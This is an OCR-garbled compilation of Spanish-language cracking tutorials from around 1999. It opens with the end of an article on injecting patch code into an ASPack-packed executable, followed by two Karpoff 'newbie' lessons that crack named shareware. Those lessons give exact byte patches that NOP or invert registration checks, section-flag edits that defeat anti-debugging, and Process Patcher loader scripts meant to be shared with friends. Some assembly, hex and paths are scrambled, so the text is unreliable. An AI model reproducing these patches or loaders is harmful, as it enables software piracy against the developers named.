; Mover el código a la memoria 
mov edi,eax 

lea esi,init 

pop ecx 

rep movsb 


; Escribir el salto al código en memoria 
mov edi, 46E5BBh 

lea es1,New!Instruction 

mov dword ptr [esi+1 ],eax 

mov ecx,6 rep movsb 


; Regresar 
popad 

push 46E0E9h 
ret 


init: 
pushad 


; Restaurar instrucción original 
mov edi, 46E5BBh 

mov dword ptr [edi],02EE18589h 
mov word ptr [edi+4],0044h 


; Escribir el parche 
mov edi,42FBAAh 
mov word ptr [edi], 2BEBh 


; Regresar 
popad 

push 46E5BBh 
ret 

final: 


Puedes ver que este código, cuando toma el control por vez primera: 


- Restaura la instrucción original en VAO = 46E0E9h 

- Obtiene la dirección de las funciones VirtualAlloc y VirtualFree. 

- Compromete memoria física con la función VirtualAlloc. 

- Mueve el recorte de código parchador a la región de memoria comprometida. 

- Cambia la instrucción en la dirección 46E5BBh para que en una segunda ocasión 
devuelva una váz más el control al recorte, ahora en el área de memoria comprometida. 

- Devuelve el control al programa en la dirección VAO. 


Cuando el programa vuelve a tomar el control y alcanza la dirección VA, devuelve por 
segunda vez el control al recorte, ahora ubicado en una región de memoria que 
previamente comprometimos para él. En esta segunda ocasión el código de recorte: 


- Restaura la instrucción original en VA1 = 46E5BBh 
*« Parcha el proceso en VA2 = 42 FBAAh 
- Retorna el control al programa. 


La parte interesante del recorte es: 


; Obtiene la dirección de la función VirtualAlloc en la memoria del proceso 

push offset 11 

call [LoadLibraryA] 

push offset f1 

push eax 

call [GetProcAddress] ; Devuelve en eax la dirección de VirtualAlloc, en este caso. 


; Reservar espacio en memoria para el recorte 
mov esi, (final - init) ; Tamaño del recorte 
push esi 

call eax,0,esi,1000h,40h . 


: Mover el código a la memoria 

mov edi,eax ; Dirección dónde se halla el recorte 

lea esi,init  ; Dirección del recorte en el código fuente 
popecx ; Tamaño del recorte 

rep movsb ; Mover el recorte 


Este código es lo que permite no tener que usar DL Ls ni loaders, y evita tener que 


aumentar el tamaño del ejecutable PE que estamos tratando. 


Ahora ensamblamos el recorte (click sobre el botón "Assemble”), exportamos el binario y 
lo llamamos SS.BIN 


Patching 


Abrimos una vista de nuestro target y otra del binario SS.BIN que hemos exprotado. 
Marcamos con el ratón toda el área correspondiente al código de nuestro binario SS.BIN y 
lo copiamos (CTRL+C). Luego marcamos el área del ejecutable StarStrider.exe 
correspondiente al espacio donde insertaremos el recorte: desde 025260h hasta 025326h y 
pegamos el binario que copiamos antes (CTRL+V). Repito una vez más que esta es la 
operación más delicada del proceso: copiar un byte de más o de menos daña por completo 
el archivo empacado. 


Lo último que nos queda es escribir en el ejecutable StarStrider.exe la instrucción en VAO 
= 46E0E9h que entregará por vez primera el control al recorte. Calculemos el 
desplazamiento: 


Desplazamiento en el Archivo = ( VAO - VA de la sección ) + RawOffset de la Sección 


El salto está en la sección .aspack cuya (VA) es 46E000h y cuyo desplazamiento en el 
archivo es 


(46E0E9h - 46E000h ) + 00025400h = 254E9h 


Nos movemos ahora en el editor hexadecinal (HexWorkshop) hasta 254E9h (EditiGoto) y 
escribimos: 


68 60 76 44 00 C3 
Es el código en octal que corresponde a las instrucciones 


6860764400 push 00447660 : VA2 
C3 ret 


Son las instrucciones que entregan por vez primera el control al recorte. 


Con esto el programa casi parecerá registrado. Sólo queda colocar nuestro nombre de 
usuario y la clave en la subclave correspondiente del registro de Windows. ¿Cómo 
encontramos esa subclave? Podemos trazarla con una trampa en Soft Ice sobre la función 


RegQueryValueExA o con un monitor de las llamadas al registro de Windows como 
Registry Monitor de Mark Rusinovich. 


Yo encontré que era: 
HKCUNSoftwarelEMJ-SoftwarelWStarStridenl 


Hay que crear una clave llamada "Username" cuyo dato sería una cadena con el nombre 
del usuario. 


Para Terminar 


Bueno. Con esto termino esta serie en tres partes sobre desprotecciones de archivos PE 
empaquetados. Yo encuentro este último procedimiento más conveniente que el 
implementado con las DLLs para crackear archivos empaquetados. Pero en algunos 
respectos prácticos el método de las DLLs podría resultar más atractivo. 


Gracias a Iczelion - Stone - _mammon, por sus extraordinarios conocimientos y 
herramientas. Trato de pagar la deuda con ellos compartiendo libremente lo que he 
aprendido y cada día descubro. 


Comentarios y correcciones: nuMIT_ or iname.com 
Mi página de programación: nuMIT_ors Programming Page 


Programa: 


Karpoff Spanish Tutor 


Visual Zip Password Recorvery Processor V3.12 MultiComputer 


PROTECCION: Enpakado, Antidebugger, Trial, serial 
Descripcion: Programa para sacar password de los zip 
Dificultad: Aficionado 

DOWNLOAD : http://www.innovativelogic.com/crosstrainer/index.htm 
Herramientas: ProcDump, W32dasm, Process Patcher 
CRACKER: 


Karpoff FECHA: 19/09/1999 


ProcDump. 


| INTRODUCCION 


$4 Tutoríal de Crackeo Para Newbies desde Cero HH Proyecto 11 


Hola Peña de Crackers, Si habéis seguido todos los manuales ya sois auténticos crackers, cuantos mas 
mejor jejeje 


En el manual anterior incorporábamos una nueva herramienta a nuestros proyectos, era el magnifico 
Como habréis observado es todo un proceso el descomprimir el ejecutable, quitarle la protección anti 


debugger y Dasm, 
desensambldor, 


y luego el proceso típico para crackearlo bien sea con Softlce O con Un 


enfin luego viene el pequeño inconveniente de que has crackeado el programa con el 
ejecutable descomprimido, pero claro si haces el correspondiente crack para dárselo a algún colegui a 
este no le servirá de nada, a no ser que le expliques el movidon del procdum , ejecutables comprimidos 
PE que se descomprimen en memoria etc. 


Bueno pues hoy pondremos remedio a ese tipo de inconvenientes, Como¿?? Crearemos un Loader, Y que es 
un Loader???? Un loader es un ejecutable que haremos nosotros que se encarga de crackear el programa 
cuando se esta ejecutando, ósea cuando se descomprime en la memoria, este tipo de cracks se usan para 
programas que en frío ( en parado, sin ejecutar) no podemos acceder al código que tenemos que 
modificar para que quedase crackeado, por lo tanto siempre que tengamos que ejecutar el programa 
víctima tendremos que correr el loader primero ( ejecutamos el loader y este carga el programa víctima 
y lo crackea temporalmente) este tipo de cracks si se los podréis dar a los coleguis, porque solo 
funcionaran con el ejecutable original ( en su estado normal, ósea comprimido) 


AL ATAKE 


PARTE 1 


La víctima es ( redoble ) takatkakakakakk. Visual Zip Password Recorvery Processor V3.12 MultiComputer. A mi 
juicio es la mejor herramienta para encontrar las password a los archivos Zip, Cuenta con muchas opciones para 
sacar password largas, a diferencia de lo típicos Advaced Zip Password o Ultra Zip Password Cracker el Visual 
Zip combina automáticamente metodos de crackeo, no lleva el proceso de crackeo típico y secuncial de 1,2,3,4 
así hasta millones de passwods ,sino que va alternando 10000, 4258, 98885 . Los usuarios registrados cuentan 
con un super diccionario para el programa, que lo podemos bajar de la Web, pero este esta encryptado y si lo 
intentas usar y no tienes registrado el programa, te escupirá una pantalla diciendo que eres un delincuente, y 
puedes ser perseguido y encarcelado, y encima te cuelga el ordenata (que cabron..) bueno veremos la forma de 
desencryptarlo. 


Lo podéis coger de: 


http://ftechsoft.hypermart .net/vzprp312.zip (480KB) 


http://ftechsoft .hypermart.net/dictv.zip (4,3MB) ( Diccionario no es necesario ) 


Herramientas: ProcDump, W32dasm, Hexedit, y para crear los loader necesitamos 


Saber programar y hacernos nuestro propio ejecutable o conseguir uno de los siguientes programas Process 
Patcher 3.0 O el R!SC's PROCESS pATCHER v1.2i estas dos herramientas funcionan mediante Scripts los dos son 
fabulosos para crear un loader, aunque yo prefiero el segundo, ya que este convierte el Script en un ejecutable 
.exe Cualquiera de los dos ocupan muy poco. 


Los podéis coger de: 


Proces Patcher 3.0 


http://karpoff.welcome.to 


R!SC's PROCESS pATCHER v1.2i 


PARTE 2 


Comportamiento del Programa: este programa no nos da limitación en cuanto a tiempo se refiere, pero solo nos 
permite Passwords de 5 dígitos, y tampoco nos permite password con mayúsculas con lo cual no nos sirve para 
nada. Tenemos la opción de registrar el programa introduciendo nombre y S/N. 


Atakes: Bueno podríamos directamente localizar un S/N valido, pero estos programas tienen especial dificultad 
para localizarlo, o por lo menos para mi es difícil, por lo tanto intentare localizar la rutina que comprueba 
que el S/N sea valido o no y la manipularemos en beneficio nuestro, 


A Crackear lo primero lógicamente instalar el programa, hacemos una copia del ejecutable vzprp.exe y abrimos el 
ProcDump seleccionamos la opción Unpak y nos muestra los algorritmos de descompresión que podemos utilizar. 


Choose Unpacker 


“Unknown 
Aspack<108 


Aspack108.2 
Aspack108. 
CodeSafe 3.% 
Hasiuk*NeoLite 
Manolo 

Neolite2 
PCGUARD v2.10 


PCShrink El 7 User Cont. 


Cuando tengamos que descomprimir un programa PE con el ProcDump, os aconsejo que seleccionéis el algoritmo de 
descompresión standard, Generalmente es el que nos descomprimirá mas ejecutables, en este caso lo descomprime 
creando un ejecutables de 684 KB , pero desgraciadamente al ejecutarlo me hizo Bommmm, pense que era debido a 
que todavía conservaba el Entry Point ( DIRECCION DE MEMORIA DONDE EMPIEZA HA EJECUTARSEE EL PROGRAMA ) del 
ejecutable pequeño (claro un ejecutable comprimido PE cuando lo ejecutamos entra directo a una dirección de 
memoria donde empieza a descomprimir el programa en memoria para que este sea funcional, si nosotros lo 
descomprimimos el ejecutable ya no tiene que descomprimirse en memoria, por lo tanto va directo a la dirección 
de memoria donde empieza la ejecución el ENTRY POINT Con lo cual el pequeño entra en un punto y el grande en 
otro ) pero lo comprobé con el Softlce y el Entry Point era el correcto. Por eso siempre que descomprimáis un 
ejecuable PE lo primero a provarlo. 


Bueno pues esta claro que el Algoritmo standard no es el adecuado. Yo lo descomprimí con el Softlce, porque me 
gusta coger practica con las herramientas que utilizamos , ya os he dicho muchas veces que yo también soy un 
novato en esto, hace 6 o 7 meses no sabia lo que era un crack creerme que es cierto, así que podéis hacerlo con 
el softice ( en le manual anterior os recomendé un tutorial sobre el procdump, hay veréis como hacerlo con el 
softice) o con el ProcDump algoritmo de descompresión PEPack ya sabéis como no?? En Unpak seleccionáis PEPack 
aceptáis y se abre el menú para escoger el ejecutable a descomprimir seleccionáis la Copia de vzprp.exe 
pulsamos abrir y se ejecutara el programa a la vez que sale una ventana de opción así 


Aceptáis y en unos segundos se abrirá el menú para guardar el nuevo archivo descomprimido, es muy importante 
que lo probéis, este funciona a la perfección. 


Si intentamos registrarnos nos sale un nagscreen diciendo Password id Inalid así que desensamblamos el 
ejecutable descomprimido con el W32dasm y no muestra datos, y si probamos con el softice lo mismo, que pasa que 
tiene protección anti debuggers y anti dasm y seguramente antitodo. Pero en el capitulo pasado ya vimos el 
truco para quitarle esta protección, ósea que vamos al ProcDump Nuevamente y pulsamos PE Editor y editamos el 
ejecutable que hemos descomprimido concretamente el que vallamos a desensamblar, asegurate de que no estas 
utilizando ese ejecutable ( que no lo tienes cargado en el W32dasm ni en ninguna otra utilidad y que no este en 
ejecución ) por que no podríamos modificarlo a nuestro gusto J cuando lo tengáis en PE edit pulsáis la opción 
Sections, y se abrirá una ventana con la cabeza del ejecutable concretamente algo así. 


D00D 0000 00001000 O0O5EC00 00000400 Coo00040 


00003000 00001000 00001800 00057000 Coo00040 
00003000 000D 4000 00000000 00058800 Coo00040 
00003000 000D7000 00001200 00058800 Coo000040 
00001000 ODO0DA000 00000000 00059400 Coo00040 
00001000 O00DB000 00000200 00059400 Co000040 


Aquí tenemos como primera opción en la lista CODE y en Characterisrics el numero C0000040 HE aquí la protección 
anti debugger, dasm etc, solo tenemos que pulsar con el botón derecho del ratón sobre la palabra CODE, se 
desplegara un menú y escogemos edit sections y modificamos el C0000040 POR E0000020 no me preguntéis por que, 
ya que no lo se lo ley en un manual y siempre me funciona, unas veces encontrareis en name la primera CODE como 
es este el caso otras veces seguramente encontrareis otros nombres, siempre modificar el que esta en primer 
lugar, (claro si tiene la protección anti Debugg.) 


Ahora probamos a desensamblarlo y perfecto, por donde empezamos??? 


Intentemos localizar Password is Invalid o Thank you for register , Ya sabéis como siempre, y la primera que 
vemos es Password is Invalid Cliqueamos encima de la frase y nos llava a 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


:0047B158(C) 

:0047B2E5 6A00 push 00000000 

:0047B2E7 668B0D28B34700 MOV CX, word ptr [0047B328] 
:0047B2EE B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Password is invalid!" 


:0047B2F0 B854B34700 mov eax, 0047B354 á Aparecemos Aquí. 
:0047B2F5 E86248FDFF call 0044FB5C 


Figaros en la línea que esta resaltada en rosa encima del aviso de error 


Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0047B158(C) 


Sabéis que quiere decir esto???? Veis que hay una dirección de memoria | :0047B158(C) 


Bien pues lo único que nos 


dice esto es que desde esa dirección de memoria se llega hasta esta parte del código mediante un salto (je jne 


), esta información es fabulosa 


Y encima si miramos un poquito mas arriba tenemos el código de validación del registro 


Osea que esto nos queda así. 


* Possible StringData Ref from Code Ob] ->"Thank You for support!" 


:0047B2D9 B834B34700 mov eax, 0047B334 
:0047B2DE E87948FDFF call 0044FB5C 
:0047B2E3 EB15 jmp 0047B2FA 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0047B158 (C) 


:0047B2E5 6A00 push 00000000 
:0047B2E7 668B0D28B34700 mov cx, word ptr [0047B328] 
:0047B2EE B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Password is invalid!" 


:0047B2F0 B854B34700 mov eax, 0047B354 
:0047B2F5 E86248FDFF call 0044FB5C 


Bueno pues parece muy sencillo no en 

0047B2D9 B834B34700 Thank You for support 

En 

0047B2E5 6A00 nos informa que un salto llega hasta aquí 
En 


0047B2F0 B854B34700 Password is invalid 


Lo veis tan sencillo como yo??? Lo primero que hacemos es comprobar que tipo de salto llega hasta el código de 


error, para ello en el W32dasm pulsamos la opción GOTO y 


Goto Code Localitation hay es donde tenemos que meter la dirección de memoria que teníamos marcada en rosa 


antes ósea 0047B158 aceptamos y oye que increíble nos lleva a 


:0047B158 0F8587010000 jne 0047B2E5 


veis que si este salto se ejecuta nos lleva directos al Password is invalid saltándose Thank You for support 
que es el mensaje de que acepta el registro, que nos interesa a nosotros?? pues lógico que no se ejecute el 


salto y para hacerlo tenemos que realizar los siguientes cambios. 


0047B158 0F8587010000 jne 0047B2E5 PoR 0047B158 0F8487010000 je 0047B2E5 


O TAMBIEN 


0047B158 0F8587010000 jne 0047B2E5 PoR 0047B158 909090909090 


yo la opcion que recomiendo es la segunda, si no se tiene que ejecutar el salto lo mejor es eliminarlo no os 
parece, en cualquier caso hacer lo que queráis. Localizamos el OFFSET y con un editor HEX editamos una copia 
del ejecutable descomprimido y localizamos los bytes a modificar, en el OFFSET 7A758 Encontramos nuestro salto 


0F85 8701 0000 y lo cambiamos por 9090 9090 9090 ahora salvamos los cambios y a probar sin nos acepta cualquier 
S/N. 


Y en efecto a funcionado acepta el S/N que metamos y elimina las limitaciones, incluso ahora podemos utilizar 
el diccionario que da la empresa de este programa ya que nos lo desencriptara , pero tenemos un problema muy 
típico, si cerramos el programa y lo ejecutamos nuevamente no mantiene el registro, aunque para este programa 
no seria un problema esto, ya que no es tan molesto ir a register y sin meter ningún dato pulsar aceptar y el 
programa queda 100% funcional. 


Pero así no tiene gracia hagamos el crack perfecto, Bueno parece ser que cuando el programa se ejecuta hace 
otra comprobación para ver si estamos registrados o no, quizás se trate de la misma rutina que es llamada desde 
otro punto del programa o quizás sea una nueva ruina de comprobación, lógico seria que si 


0047B158 0F8587010000 jne 0047B2E5 este salto era el que nos llevaba a la rutina de error bien podría existir 
otro salto o un call que llamase a la misma dirección, busquemos con la opción find text (la linterna) la 
dirección 0047b2e5 pero desgraciadamente no hay mas llamadas a ese punto, cambiemos de táctica cuando el 
programa esta registrado podemos ver en la parte inferior un texto que pone 


system messages pero cuando esta en evaluación el texto cambia a Unregistered Version 


Intentemos atacar por aquí vamos a buscar en el W32dasm Unregistered Version y veremos si podemos hacer algo 
cliqueamos sobre la frase y aparecemos en 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00475F4F (C) 

:00475F66 33D2 xor edx, edx 

:00475F68 8B8300030000 mov eax, dword ptr [ebx+00000300] 
:00475F6E E88974FBFF call 0042D3FC 


* Possible StringData Ref from Code Obj ->"Unregistered version!" 


:00475F73 BAAO5F4700 mov edx, 00475FA0O aparecemos aqui 
Yo estoy buscando un salto que evite que se imprima este mensaje y tenemos uno en 
:00475F26 7574 jne 00475F9C 


Pero por mas que lo manipulemos no nos registra el programa. 
Si cliquiemos nuevamente sobre Unregistered Version vemos que cambiamos de dirección ousease que hay otra 
llamada a este texto. Aparecemos en. 


* Possible StringData Ref from Code Obj ->"Unregistered version!" 


:0047AA89 BA98AB4700 mov edx, 0047AB98 aparecemos aqui 
:0047AA8E E8A92AFBFF call 0042D53C 

:0047AA93 A1FCDE4700 mov eax, dword ptr [0047DEFC] 
:0047AA98 C60000 mov byte ptr [eax], 00 

:0047AA9B 8B87DC020000 mov eax, dword ptr [edi+000002DC] 


ahora como antes quiero encontrar algo que haga que no se imprima este texto Unregistered versión Busco por 
encima del texto en busca de un salto o una llamada call 


y justo encima tenemos un salto muy sospechoso porque le precede una comprobación de tipo cmp que supongo que 
hará algo así si todo esta correcto le paso a je el valor adecuado para que salte evitando imprimir 
Unregistered version si algo esta mal le digo a je que no se ejecute y así imprime Unregistered version lo 
entendéis, como siempre os digo estos son mis razonamientos, y puede que no sean del todo correctos, bueno 
veamos el salto que os estoy comentando. 


:0047AA79 807DD000 cmp byte par [ebp-30], 00 -- COMPARACION 


:0047AA7D 0F8481000000 je 0047AB04 -— SI NO SALTA IMPRIME EL MENSAGE DE ERROR 


Bueno tenemos que hacer que salte para evitar Unregistered versión tenemos que convertir el salto en un salto 
incondicional JMP ( que salte siempre ) tenemos un je de 6 Bytes no es el típico salto de dos bytes ( 7401 je, 
7531 jne ) 


Como ya he explicado en manuales anteriores como saber cuales son Los Bytes nuevos que sustituirán a 
0F8481000000 esta vez no me perderé en detalles, si alguno no sabéis como hacerlo consultar los manuales 
anteriores que hay en mi Web. Bueno para convertirlo en un salto incondicional vamos a el editor HEX y en el 
offset 7a07d sustituimos 


0r84 8100 0000 Por E982 0000 0000 


Y ahora salvamos los cambios y probamos, olee perfecto ya se inicia sin ninguna restriccion y nos permite 
utilizar el diccionario encriptado que da el programador a los usuarios registrado. Bueno pues ya esta, para 
que os ocupe menos el ejecutable que habéis crackeado podéis comprimirlo con cualquier compresor PE. Ya sabéis 
que si hacéis el crack de los ejecutables descomprimidos solo os sirven a vosotros, ya comente esto en la 
introducción de este manual. 


Ahora veremos como hacemos un loader para poder utilizar el crack con el archivo original (comprimido) primero 
os explico como hacerlo con el Process Patcher 3.0 


Bueno ya lo tenéis instalado y habéis leído como funciona, yo os mostrare el Script. 


Con cualquier editor de textos (el bloc de notas es perfecto) editamos el archivo ppatcher.ppc que viene como 
ejemplo con el Process Patcher 3.0 esto es para que os agais una idea de cómo hay que poner los datos, y en 
otra ventana del bloc de notas escribimos lo siguiente. 


ifProcess Patcher Configuration File 


Version=3.0 


DisplayName= Visual Zip Password Recorvery 3.12 --—- Nombre del programa 
Filename=vzprp.exe --- NOMBRE DEL ARCHIVO 

Filesize=289280 --- TAMAÑO EN BYTES DEL ARCHIVO (EL ORIGINAL) 
Arguments=/shell --- OPCIONES LEER EL README 

WaitInfinite=false --- OPCIONES LEER EL README 

Address=0x47AA7D:0x0F:0xE9 -- DIRECCION DE MEMORIA:BYTE ORIGINAL:BYTE NUEVO 


Address=0x47aa7E:0x84:0x82 


Address=0x47aa7F:0x81:0x00 


Address=0x47aa80:0x00:0x00 


Address=0x47aa81:0x00:0x00 


Address=0x47B158:0x0f:90 


Address=0x47B159:0x85:90 


Address=0x47B15a:0x87:90 


Address=0x47B15b:0x01:90 


Address=0x47B15c:0x00:90 


Address=0x47B15d:0x00:90 


Este es para el proces patcher v3 copiais todo al bloc de notas menos lo que esta en rojo y lo guardais como 
archivo.ppc, seguidamene cogéis el proces patcher v3 y lo copiais al directorio donde tengáis instalado el 
Visual zip. Para que podamos ejecutar el archivo.ppc como si seria un ejecutable seguir los siguientes pasos. 


Abrimos una ventana a MS/DOS que este en el directorio donde tenemos instalado el Visual Zip y en la línea de 
comandos del DOS ponemos C:1lppatcher.exe /shell con esto conseguimos asociar la extensión .ppc al procees 
patcher con lo cual desde windows si cliqueamos sobre nuestro archivo.ppc este funcionara como ejecutable, pero 
debéis tener instalado el proces patcher v3 en el mismo directorio donde tenéis el visual zip cuando ejecutéis 
archivo.ppc este ara que se ejecute Visual Zip y lo crackeara en memoria , eso si cada vez que tengamos que 
utilizar el visual zip deberemos ejecutar archivo.ppc y este se encarga de ejecutar nuestra víctima, Claro que 
vosotros como tenéis los ejecutables descomprimidos y crackeados no necesitáis esto, ya que podéis utilizar el 
ejecutable crackeado nuevamente comprimido con un PE o sin comprimir. 


Que tenéis un colega que tiene el programa y quiere un crack pero no tiene idea de procdum ni de nada similar, 
pues le dais el archivo.ppc (con el proces Patcher claro) 


Si!! ya se, que lo ideal para nuestros colegas seria darle un loader pero un archivo.exe sin tanto royo, bueno 
pues para eso tenemos el R!SC's PROCESS pATCHER v1.2i 


La ventaja de este es que convierte el script en un ejecutable .exe. os explico. 


Ya de por si nos trae bastantes ejemplos para que no tengamos ningún problema a la hora de crear nuestro script 


abrimos el bloc de notas y copiamos esto 


L=2000 ---- Tiempo de retardo por se ejecuta el programa y no le da tiempo a partchearlo los valore son en 
mlsegundos (creo) 


F=vzprp.EXE: ---- NOMBRE DEL ARCHIVO A CRACKEAR 
O=karpoff.exe: ---- NOMBRE DEL SCRIP ESTE PARA QUE LO CONVIERTA EN UN EJECUTABLE .EXE 
P=47AA7D/0f,84,81,00,00/E9,82,00,00,00: ----p=DIRECCION DE MEMORIA/BYTES ORIGINALES/BYTES NUEVOS 


P=47B158/0F,85,87,01,00,00/90,90,90,90,90,90: 


ESTE ES EL SCRIPT QUE TENEIS QUE COPIAR 


L=2000 


F=vzprp.EXE: 


O=karpoff.exe: 


P=47AA7D/0f,84,81,00,00/E9,82,00,00,00: 


P=47B158/0F,85,87,01,00,00/90,90,90,90,90,90: 


tenemos que guardar esto con el nombre que querais pero con la extensión .rpp 


ahora como lo con vertimos en un .exe vamos al directorio done tenemos instalado el R!SC's PROCESS pATCHER 
v1.2i ejecutamos el archivo rpp.exe y nos pedirá mediante un menú de búsqueda de archivos, el script.rpp que 
queremos convertir en un ejecutable .exe lo seleccionáis y tenéis un loader como dios manda, este si se lo 
podéis pasar a lo colegas. 


Pues nada mas solo decir que este programa me lo sugirió Erika mediante un Email, ya que parece no haber ningún 
crack para este programa, también deciros que ya hay un versión nueva de el Visual Zip Recorbery concretamente 
la versión 3.2 esta versión no aporta nada nuevo en lo que a utilidad se refiere, solo ha cambiado su entorno 
gráfico que ahora cuenta con botones gráficos, y aparte necesita bastantes mas recursos para su funcionamiento, 
también lo he crackeado aunque me costo mas por que tiene mas protecciones, pero con este manual y un poco de 
paz_y ciencia no tendréis ningún problema para crakearla. 


Espero que me halla expresado bien, como siempre digo no es fácil escribir cuesta expresarte en un texto y 
requiere mucho tiempo. 


Con cualquier duda no tengáis reparo en mandarme un email, contesto a todos los email. 


Un saludo para todos/as (karpoff) 


Kf_karpoff hotmail.com 


http:/Awelcome.to/karpoff 


http://come.to/karpoff 


http://karpoff.exit.de 


http://karpoff.tsx.org 


El uso de este material es solo para uso educativo, por ahora los cracks son ilegales cada cual es responsable 
del uso que le de a este tutorial. 


Karpoff spanish Tutor 2000 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


HH Tutoríal de Crackeo Para Newbies desde Cero 11/09/99 


Por Karpoff Hi GRUPO KF_CRACK KARPOFF-NEW 98/99 +44 


PROYECTO 10 HH 


Parte 1 


Hola Coleguis Otro mas, la verdad es que hacer un manual de estos me lleva algunas horas 
(aunque creáis lo contrario) así que no tengo tiempo Casi ni para comer, pero si os sirven de 
algo es suficiente, y por los emails que recibo se que alguien los lee uff. 


Estamos en el manual n* 10, hemos utilizado el W32dasm, el Softice, y un HEXedit 


Hoy incorporo una herramienta mas que Cada vez es mas necesaria, se trata del ProcDump. Cada 
vez son mas los programadores que utilizan Compresores PE (Portable Ejecutable), estos 
compresores (petite, neolite, hasky etc) lo que hacen es comprimir el ejecutable de un 
programa dado, pongamos como ejemplo el Offline Explorer v1.2 178 BETA 
3ftp://ftp.datacomm.ch/.3/tucows/files4/oebsetup.exe , SI instalamos este programa veremos que 
su ejecutable ocupa exactamente 448KB y descomprimido con ProcDump ocupa 1.087KB y los dos 
funcionaran igual, La mayoría de los programas hoy en día son programados con lenguajes 
visuales ( visual basic, visual C+ etc.) y claro esto genera una cantidad sobrada de código 
fuente creando ejecutables gigantes, de hay que los programadores se vean obligados a utilizar 
algún remedio. Pero que tiene esto que ver con el cracking ¿7? 


Bueno explico como funciona un programa comprimido con el ProDump ( RODOLFO esto va para ti y 
tu pregunta sobre la compresión del Cpasos) 


Al ejecutar el programa lo primero que hace es descomprimirse en la memoria y a partir de hay 
su ejecución es normal, como nos perjudica esto a nosotros los crackers¿? Pues seguramente 
alguna vez habéis ido a desensamblar un programa que solíais crackear en versiones anteriores, 
y de repente la nueva versión no se desensambla o si pero no nos muestra Casi nada de código, 
y si estamos utilizando el softice estamos viendo código que no podremos manipular, ya que si 
localizamos con el softice un salto (Je jne ) que sea vital para hacer el crack ( ósea que sea 
el salto que tenemos que parchear para que el programa quede crackeado) y apuntamos su 
dirección de memoria y el OFFSET, cuando lo editemos con el editor HEX posiblemente no estará 
ni la dirección de memoria ni el salto localizado, por que¿? Por que como he dicho el programa 
al ejecutarse se descomprime en memoria, ósea que en frío nunca podremos acceder a ciertos 
procesos del programa, con lo cual el programador tiene un programa que ocupa menos y además 
para el cracker mas complicado, ( cuanto mas grande sea el reto a la hora de crackear mejor, 
de eso se trata no¿?) para este tipo de programas el tipo de crack que se suele hacer es un 
loader. Que es un loader ¿? es un crack que hace sus parcheos mientras se ejecuta el programa, 
en un proceso de la memoria, pero nunca queda definitivamente crackeado, siempre que tengamos 
que ejecutar el programa, tendremos que ejecutar primero el loader y este se encarga de correr 
el programa y parchearlo en memoria. 


En esta dirección tenéis un manual sobre las funciones del ProcDump Es obligatorio leer este 
manual 


http: //www.wco.com/-micuan/WKT/pdumptut . htm 


Y aquí tenéis el ProcDump en su ultima versión 


http://w3.to/protools lo encontrareis en la sección Umpakers, os recomiendo que os bajeis de 


esta pagina algún compresor PE como el Petite por que lo utilizaremos los compresores están en 
la sección Pakers 


PARTE 2 


Y ya sin mas vamos a empezar con la víctima, habíamos dicho que el programa escogido era el 
conocido Offline Explorer v1.2 178 BETA 3 tengo que decir que cuando empece a escribir este 
Tutorial, la versión del Offline Explorer era la Beta 2, y a la hora de buscar las direcciones 
para que bajaseis el programa ya había una nueva versión la Beta 3, la podéis coger de: 


Ocupa (508KB) 


ftp://ftp.datacomm.ch/.3/tucows/files4/oebsetup.exe 


ftp://ftp.ntua.gr/pub/pc/tucows/files4/oebsetup.exe 


Este programa es una gran utilidad para vajarnos paginas Web enteras, par poder verlas 
offline, cuenta con un pequeño navegador y es bastante rápido a la hora de descargar paginas y 
archivos. 


Herramientas: W32dasm, ProcDump, y un editor HEX. 


Comportamiento del programa: este programa nos da una evaluación de 30 días, pasado este 
tiempo nos muestra un nag con la opción de registrarnos mediante nombre y numero de serie, si 
no aciertas con el registro se cierra automáticamente sin posibilidad de poder utilizar 
ninguna función del programa. 


Ataque: Lo mas limpio seria localizar un S/N valido para registrarnos, pero de lo que se trata 
es de aprender a utilizar las herramientas. 


Localizaremos la rutina que verifica si ha finalizado la evaluación o no, manipulándola en 
nuestro beneficio, con lo cual simularemos estar registrados. 


A trabajar: IMPORTANTE como acabamos de descargar el programa lógicamente no esta caducado, 
para seguir sin dificultad este manual RECOMIENDO Que adelantéis la fecha de vuestro Windows 
unos 35 días para poder utilizarlo como caducado (una vez restaurada la fecha el programa 
vuelve a su estado de evaluación) 


Instalamos el programa, Intentemos desensamblar OE.exe con el W32Dasm y como os había 
comentado no muestra código así que abrimos el ProcDump y este es su aspecto. 


Pla ES 


c:windows!systemikemel32. dll FFEF27F9  BFF?0000 00075000  7E9E2541 
c windows systemimsgstv32.exe FFFF1069 — 00000000 00000000  FFEF27F9 
c windows! systemimprexe. exe FFFF6699 — 00500000 00007000  FFFF1069 
c:windowssystemimmtask.tsk FFFF7EES 00000000 00000000  FFFF1069 
c4archivos de programatpanda antiviru... FFFFÁB6D 00400000 00025000  FFFF6699 
cwwindowsexplorer.exe FFFC622D 00400000  0002C000  FFFF1069 , 
c:Mintemetimedia95+ vi arm.exe FFFFE409 00000000 00000000  FFFC622D 


Lo primero que tenemos que hacer es descomprimir OE.exe , para hacerlo pulsamos la opción 
[Unpack] esto nos abrirá una nueva ventana con un lista de nombres raros estos nombres raros 
son algoritmos de descompresión, ósea que si el programa fue comprimido con el compresor PE 
petite V2, Pues para descomprimirlo tendremos que elegir el algoritmo petite 2, pero como 
sabemos con que compresor PE esta comprimido ¿? Pues para mi es un misterio, pero seguro que 
existe alguna utilidad que nos dice que tipo de compresor se ha utilizado yo suelo ir probando 
con todos los algoritmos asta que acierto, el ProcDump tiene su propio algoritmo llamado 
estándar es con este con el primero que debemos probar. 


Bueno íbamos por pulsamos la opción [Unpack] y nos aparece esto. 


CodeSafe 3.< 

Hasiuk*NeoLite 
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Y seleccionamos el algoritmo Aspack108.3 que es el adecuado para nuestra víctima una vez 
seleccionado pulsamos ok, en este momento se abrirá un menú para que escojamos el archivo que 
vamos a descomprimir, vamos a la carpeta o directorio donde tenemos instalado offline explorer 
y hacemos doble clip en OE.exe aparece 


Esto: 


Mientras aparece esto seguramente se empezara a ejecutar el programa offline explorer, en ese 
momento pulsáis en la ventana Pease hit OK when task is loader (check taskBar) Aceptar, Offline 
